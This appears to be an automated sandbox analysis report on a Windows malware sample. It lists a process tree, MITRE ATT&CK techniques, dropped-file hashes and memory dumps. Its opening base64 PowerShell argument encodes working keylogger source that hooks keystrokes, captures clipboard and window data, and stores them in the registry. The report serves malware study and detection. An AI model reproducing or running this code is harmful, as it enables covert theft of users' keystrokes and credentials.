ZgAgACgAbgA2ADUAIAAhAD0AIABkADEAOAApAHsAcwB0AHIAaQBuAGcAIABhADYAOQAgAD0AIAAiACIAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAcAA3ADAAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGUAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBmACAAKABlADEAMgAgACEAPQAgADAAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGUAMQAyACkAOwBwADcAMAAuAEMAYQBwAGEAYwBpAHQAeQAgAD0AIABtADMANwAgACsAIAAxADsARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdAAoAGUAMQAyACwAIABwADcAMAAsACAAbQAzADcAIAArACAAMQApADsAdQBpAG4AdAAgAF8AcAByAG8AYwBfAGkAZABfACAAPQAgADAAOwBpAGYAIAAoAEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAZQAxADIALAAgAHIAZQBmACAAXwBwAHIAbwBjAF8AaQBkAF8AKQAgACEAPQAgADAAKQB7AFAAcgBvAGMAZQBzAHMAIABrADcAMQAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAF8AcAByAG8AYwBfAGkAZABfACkAOwBpAGYAIAAoAGsANwAxACAAIQA9ACAAbgB1AGwAbAApACAAYQA2ADkAIAA9ACAAawA3ADEALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwB9AH0AcAA3ADAALgBBAHAAcABlAG4AZAAoACIAIAA6ADoAIABDAGwAaQBwAGIAbwBhAHIAZAAiACkAOwBqADYANgAuAFIAZQBtAG8AdgBlACgAMAAsACAAagA2ADYALgBMAGUAbgBnAHQAaAApADsAagA2ADYALgBBAHAAcABlAG4AZAAoAG4ANgA1ACkAOwBmADQAMQAoAHAANwAwACwAIABhADYAOQAsACAAagA2ADYAKQA7AGQAMQA4ACAAPQAgAG4ANgA1ADsAfQB9AHMAdAByAGkAbgBnACAAaQA3ADIAIAA9ACAAIgAiADsAbAAyADgAIABtADcAMwA7AGkAZgAgACgAbwAyADcAIAAhAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQB7AHUAaQBuAHQAIABlADcANAAgAD0AIAAxADAAMAAwADAAOwBiAHkAdABlAFsAXQAgAGYANwA1ACAAPQAgAG4AZQB3ACAAYgB5AHQAZQBbAGUANwA0AF0AOwBpAGYAIAAoAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABvADIANwAsACAAbgB1AGwAbAAsACAAZgA3ADUALAAgAG8AdQB0ACAAZQA3ADQAKQAgAD0APQAgADAAKQB7AEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACAAagA3ADYAIAA9ACAAYgA2ADAAKABmADcANQApADsAaQBuAHQAIABuADcANwAgAD0AIABqADcANgAuAEMAbwB1AG4AdAA7AGkAZgAgACgAbgA3ADcAIAA+ACAAMAApAHsAaQBuAHQAIABuADcAOAAgAD0AIAAwADsAbAAyADgAWwBdACAAbwA3ADkAIAA9ACAAbgBlAHcAIABsADIAOABbAG4ANwA3AF0AOwBmAG8AcgBlAGEAYwBoACAAKABzAHQAcgBpAG4AZwAgAG4AOAAwACAAaQBuACAAagA3ADYAKQB7AG8ANwA5AFsAbgA3ADgAXQAuAGEAMgA5ACAAPQAgAG4AOAAwADsAbgA3ADgAKwArADsAfQBpAGYAIAAoAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAG8AMgA3ACwAIAA1ADAAMAAsACAAbwA3ADkALAAgAG8ANwA5AC4ATABlAG4AZwB0AGgAKQAgAD0APQAgADAAKQB7AGYAbwByACAAKABpAG4AdAAgAG4AOAAxACAAPQAgADAAOwAgAG4AOAAxACAAPAAgAG4ANwA3ADsAIABuADgAMQArACsAKQB7AG0ANwAzACAAPQAgAG8ANwA5AFsAbgA4ADEAXQA7AGkANwAyACAAKwA9ACAAbQA3ADMALgBhADIAOQA7AGkAZgAgACgAKABtADcAMwAuAGgAMwAyACAAJgAgADAAeAAwADAAMAAwADAAMAAyADAAKQAgACEAPQAgADAAKQAgAGkANwAyACAAKwA9ACAAIgAgAC0AIABmAG8AdQBuAGQAIgA7AGkANwAyACAAKwA9ACAAIgBcAHIAXABuACIAOwB9AH0AfQB9AH0AUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAZwAyADAALAAgAHAAMgAyACwAIABpADcAMgApADsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAC4AUwBsAGUAZQBwACgAMQAwADAAMAApADsAfQByAGUAdAB1AHIAbgAgADAAOwB9AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABpAG4AdAAgAGkAOAAyACwAIABwADMAIABtADgAMwAsACAASQBuAHQAUAB0AHIAIABsADgANAAsACAAdQBpAG4AdAAgAGQAOAA1ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGcAOAA2ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGcAOAA2ACwAIABpAG4AdAAgAGsANAA4ACwAIABJAG4AdABQAHQAcgAgAGgANAA5ACwAIABJAG4AdABQAHQAcgAgAGwANQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABzAHQAcgBpAG4AZwAgAGUAOAA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABpAG4AdAAgAGsAOAA4ACwAIAB1AGkAbgB0ACAAZQA4ADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAdQBpAG4AdAAgAG4AOQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGkAbgB0ACAAYgA5ADEALAAgAHUAaQBuAHQAIABrADkAMgAsACAAYgB5AHQAZQBbAF0AIABqADkAMwAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGkAOQA0ACwAIABpAG4AdAAgAGgAOQA1ACwAIAB1AGkAbgB0ACAAZQA5ADYALAAgAHUAaQBuAHQAIABhADkANwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAYgB5AHQAZQBbAF0AIABtADkAOAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKAB1AGkAbgB0ACAAbgA5ADkALAAgAHIAZQBmACAAdQBpAG4AdAAgAGEAMQAwADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQATABlAG4AZwB0AGgAKAB1AGkAbgB0ACAAawAxADAAMQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAdQBpAG4AdAAgAGsAMQAwADEALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABuADEAMAAyACwAIABpAG4AdAAgAGQAMQAwADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABjADEAMAA0ACwAIAB1AGkAbgB0ACAAbwAxADAANQAsACAAcAA2ACAAZQAxADAANgAsACAASQBuAHQAUAB0AHIAIABpADEAMAA3ACwAIAB1AGkAbgB0ACAAZQAxADAAOAAsACAASQBuAHQAUAB0AHIAIABlADEAMAA5ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAB1AGkAbgB0ACAAawAxADEAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIAIABqADEAMQAxACwAIABiAG8AbwBsACAAcAAxADEAMgAsACAAcwB0AHIAaQBuAGcAIABlADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABPAHAAZQBuAE0AdQB0AGUAeAAoAHUAaQBuAHQAIABoADEAMQA0ACwAIABiAG8AbwBsACAAYgAxADEANQAsACAAcwB0AHIAaQBuAGcAIABlADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEUAcwB0AGEAYgBsAGkAcwBoAEMAbwBuAHQAZQB4AHQAKABJAG4AdAAzADIAIABrADEAMQA2ACwAIABJAG4AdABQAHQAcgAgAG0AMQAxADcALAAgAEkAbgB0AFAAdAByACAAYQAxADEAOAAsACAAbwB1AHQAIABJAG4AdABQAHQAcgAgAGkAMQAxADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBTAEMAYQByAGQATABpAHMAdABSAGUAYQBkAGUAcgBzAEEAIgAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABJAG4AdABQAHQAcgAgAGkAMQAxADkALAAgAGIAeQB0AGUAWwBdACAAbAAxADIAMAAsACAAYgB5AHQAZQBbAF0AIABlADEAMgAxACwAIABvAHUAdAAgAFUASQBuAHQAMwAyACAAbwAxADIAMgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAEkAbgB0AFAAdAByACAAaQAxADEAOQAsACAAVQBJAG4AdAAzADIAIABoADEAMgAzACwAIABbAEkAbgAsACAATwB1AHQAXQAgAGwAMgA4AFsAXQAgAG8ANwA5ACwAIABJAG4AdAAzADIAIABlADEAMgA0ACkAOwB9AH0ADQAKACIAQAAgAC0AUgBlAGYAZQByAGUAbgBjAGUAZABBAHMAcwBlAG0AYgBsAGkAZQBzACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAWwBjADEALgBtADIAXQA6ADoAUgB1AG4AKAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBjAG8AbgBzAG8AbABlAF0AOgA6AEMAYQBwAHMATABvAGMAawAgAH0AIAApAA==
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2924
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3skr4cdg\3skr4cdg.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD198.tmp" "c:\Users\Admin\AppData\Local\Temp\3skr4cdg\CSC2C60A71B834135A8C82E38BAB2C4E1.TMP"
    3⤵
    PID:1704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6f0a8243323a703575428ee4bdb69e86

SHA1
1d8ac270e18225f251cc4e2cf96e18a5649f0854

SHA256
2106bc2a7ed502357427a85382033f0447efdfa06170635ea68d0d67d04c1d75

SHA512
5b1fcdb025c037a11d0c84a120296ba7e49f3bcf4590e5b9c3a26fc12d098794c6fb06edf73d22fe9b4c5def34cd03d794c7103b6ccdaedf07d5525dde3d3ac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\3213331264

Filesize
41KB

MD5
c4d2d117803c4f2a631087eb2ade30a6

SHA1
ff32d1b965a2f5956639b6540e5c2d15e7f289d9

SHA256
375e8265900a3c4acebd38bdcd959efa80ccc73a47003eef7b6fc019bfd118c8

SHA512
ae85c1b6f948cf298ae498b653ee3435a96b4dd1cde65f0edb426b8c0d596f14b6bc8c5b7598278e6779f1b38f2158ade30b9dbba7c9b0dad04fb83c616b1ab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\3skr4cdg\3skr4cdg.dll

Filesize
9KB

MD5
d6aa01a6347e9aba3f01a2ac7d5a8d4d

SHA1
9b14d8f9d1b990c7071a3633cea3a2035eb641e8

SHA256
0e4cc7b71cfca5956555e8f43a937ab4dc5109b7a2eeedda6273ceaa7a2fba4c

SHA512
d21b6e497cd406f332fd05066a0ce9f7f8076f343a18d3e271a9237f86ee7a15ed9a4735881eb05822a6715fda2aee7a65b0e62d22d6092a7ac5f9a1a1da6695

Download Submit
C:\Users\Admin\AppData\Local\Temp\445113777

Filesize
56KB

MD5
cb0b3aa58373b87e080e433a5574ad8f

SHA1
361eee36a9f713a6137379eae1b2367ac8de4656

SHA256
5675cbadab71a1c16bd15be57cc29fc3f67a73ba16efa6d7fd239dba849cd240

SHA512
3a5e893956aa54c213bb79a6a669c4f379b47a892eedd618e58cebf26eacf24b4470c04394d585e91d6bcbd0a9865ca6c98d18a9597cf9d6177a64b733c9ad44

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD198.tmp

Filesize
1KB

MD5
393b38e1679d568a355e764e649aa3f7

SHA1
c7bb8a02ffd663b6a875babc54fa9ad4a1fb45e5

SHA256
961b8e4d4fdef5359ef98eca924f885394fdcfcb226149c4a895c492b5c81bd2

SHA512
c8e37133d108948f4b2887adbb07e85bd223036129b90f077e904a967b4c64ea5b7ac0d0d185c42fd352b4c8d62a13a345e5ca4332382181b2dc70cfe9aa124b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvqnk4km.aj2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

Filesize
13KB

MD5
0a235e8362613509efd31bfdbb22f978

SHA1
8bcb0297001dfd4963e8d17270ad0d2024a96912

SHA256
175c6cc0a98c16f18e333b5622415d3d962a5d1c05044d34823c8541d6abfcd5

SHA512
bb2cf2457ba063c971c9944f9a6fda4a89eab80265e270f6371a826bdfc753a62828c83f984897127f213837adb8f90956263dd51823e270c5081fafea630db4

Download Submit
C:\Users\Admin\AppData\Local\a580142d0.js

Filesize
56KB

MD5
cb0b3aa58373b87e080e433a5574ad8f

SHA1
361eee36a9f713a6137379eae1b2367ac8de4656

SHA256
5675cbadab71a1c16bd15be57cc29fc3f67a73ba16efa6d7fd239dba849cd240

SHA512
3a5e893956aa54c213bb79a6a669c4f379b47a892eedd618e58cebf26eacf24b4470c04394d585e91d6bcbd0a9865ca6c98d18a9597cf9d6177a64b733c9ad44

Download Submit
C:\Users\Admin\AppData\Local\dynwrapx.dll

Filesize
13KB

MD5
ca820517f8fd74d21944d846df6b7c20

SHA1
1f87eeb37156d64de97d042b9bcfbaf185f8737d

SHA256
1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

SHA512
27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

Download Submit
C:\Users\Admin\AppData\Local\dynwrapx.dll

Filesize
13KB

MD5
ca820517f8fd74d21944d846df6b7c20

SHA1
1f87eeb37156d64de97d042b9bcfbaf185f8737d

SHA256
1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

SHA512
27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3skr4cdg\3skr4cdg.0.cs

Filesize
7KB

MD5
e066db88e6449f080d05d141f75699cc

SHA1
b5b068723dda77943d5dfc71368090da414d0f89

SHA256
bbfe63aff655c41a117fd47da963920543e09f5e9789c68dfd5b319dc1c63605

SHA512
d3d2809b6c8e932254be007eb6688c8388063298315436522aaa5b7cd18ebe93552f74c20934010d97e0f2cae1c39e9d1b723a750538c376812bbb251268ba74

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3skr4cdg\3skr4cdg.cmdline

Filesize
494B

MD5
7cbb250b75b215f20f48a2107e2aaadf

SHA1
5336a8739c41abf073db56418e6a823a5a906070

SHA256
bab21d347c01c8ccb8383ed7f5d5228ef3e51103a622dc58be8f23fdba823311

SHA512
edb00ef0eea2c02a2303e1e7f557ae1121c162e6645a3fae497fd5639b4a563c97cc0b34f28fa5de70913ce216e17ea29e60a82d668f68ecfa5c33b8ae6f3371

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3skr4cdg\CSC2C60A71B834135A8C82E38BAB2C4E1.TMP

Filesize
652B

MD5
9c9451643447ada8d713bacb863f4cf9

SHA1
daf2a421b69e838e17f8d845ef4473a284feb018

SHA256
4c4e9c15e849e0a8a1aadde26f0c3a39cb0d8849dd4111e6c4adaf5328f9ef11

SHA512
e761b66bc9b3118dcaa0ceb39146a3eb22babc026fcc9db1cd8496356634b8b278377b4a5a8d4a10aee33b99d0f19d4ab4876f745a046fc6188da6a30b4c9c0a

Download Submit
memory/1984-253-0x00000000074B0000-0x0000000007B2A000-memory.dmp

Filesize
6.5MB

Download
memory/1984-227-0x00000000712F0000-0x000000007133C000-memory.dmp

Filesize
304KB

Download
memory/1984-277-0x0000000073700000-0x0000000073EB0000-memory.dmp

Filesize
7.7MB

Download
memory/1984-181-0x00000000054D0000-0x0000000005536000-memory.dmp

Filesize
408KB

Download
memory/1984-271-0x0000000004680000-0x0000000004690000-memory.dmp

Filesize
64KB

Download
memory/1984-176-0x0000000004680000-0x0000000004690000-memory.dmp

Filesize
64KB

Download
memory/1984-270-0x0000000004680000-0x0000000004690000-memory.dmp

Filesize
64KB

Download
memory/1984-269-0x0000000007190000-0x0000000007198000-memory.dmp

Filesize
32KB

Download
memory/1984-268-0x00000000071B0000-0x00000000071CA000-memory.dmp

Filesize
104KB

Download
memory/1984-174-0x0000000073700000-0x0000000073EB0000-memory.dmp

Filesize
7.7MB

Download
memory/1984-221-0x0000000004680000-0x0000000004690000-memory.dmp

Filesize
64KB

Download
memory/1984-175-0x0000000004680000-0x0000000004690000-memory.dmp

Filesize
64KB

Download
memory/1984-205-0x0000000005B50000-0x0000000005B6E000-memory.dmp

Filesize
120KB

Download
memory/1984-224-0x00000000060B0000-0x00000000060E2000-memory.dmp

Filesize
200KB

Download
memory/1984-248-0x0000000073700000-0x0000000073EB0000-memory.dmp

Filesize
7.7MB

Download
memory/1984-225-0x000000007FC80000-0x000000007FC90000-memory.dmp

Filesize
64KB

Download
memory/2380-222-0x00000000035E0000-0x00000000035F0000-memory.dmp

Filesize
64KB

Download
memory/2380-267-0x0000000007EB0000-0x0000000007EBE000-memory.dmp

Filesize
56KB

Download
memory/2380-228-0x00000000035E0000-0x00000000035F0000-memory.dmp

Filesize
64KB

Download
memory/2380-226-0x00000000712F0000-0x000000007133C000-memory.dmp

Filesize
304KB

Download
memory/2380-223-0x000000007F930000-0x000000007F940000-memory.dmp

Filesize
64KB

Download
memory/2380-177-0x0000000005BB0000-0x0000000005BD2000-memory.dmp

Filesize
136KB

Download
memory/2380-278-0x0000000073700000-0x0000000073EB0000-memory.dmp

Filesize
7.7MB

Download
memory/2380-255-0x0000000007CE0000-0x0000000007CEA000-memory.dmp

Filesize
40KB

Download
memory/2380-178-0x0000000006310000-0x0000000006376000-memory.dmp

Filesize
408KB

Download
memory/2380-259-0x0000000007F10000-0x0000000007FA6000-memory.dmp

Filesize
600KB

Download
memory/2380-220-0x00000000035E0000-0x00000000035F0000-memory.dmp

Filesize
64KB

Download
memory/2380-165-0x0000000005C70000-0x0000000006298000-memory.dmp

Filesize
6.2MB

Download
memory/2380-164-0x00000000035E0000-0x00000000035F0000-memory.dmp

Filesize
64KB

Download
memory/2380-238-0x0000000006F10000-0x0000000006F2E000-memory.dmp

Filesize
120KB

Download
memory/2380-219-0x0000000073700000-0x0000000073EB0000-memory.dmp

Filesize
7.7MB

Download
memory/2380-252-0x0000000007C80000-0x0000000007C9A000-memory.dmp

Filesize
104KB

Download
memory/2380-163-0x0000000073700000-0x0000000073EB0000-memory.dmp

Filesize
7.7MB

Download
memory/2380-162-0x00000000034C0000-0x00000000034F6000-memory.dmp

Filesize
216KB

Download
memory/2924-206-0x00007FFD0D460000-0x00007FFD0DF21000-memory.dmp

Filesize
10.8MB

Download
memory/2924-217-0x0000025608550000-0x0000025608560000-memory.dmp

Filesize
64KB

Download
memory/2924-218-0x0000025608550000-0x0000025608560000-memory.dmp

Filesize
64KB

Download
memory/2924-212-0x0000025608A00000-0x0000025608A22000-memory.dmp

Filesize
136KB

Download
memory/2924-279-0x00007FFD0D460000-0x00007FFD0DF21000-memory.dmp

Filesize
10.8MB

Download
memory/2924-280-0x0000025608550000-0x0000025608560000-memory.dmp

Filesize
64KB

Download
memory/2924-281-0x0000025608550000-0x0000025608560000-memory.dmp

Filesize
64KB

Download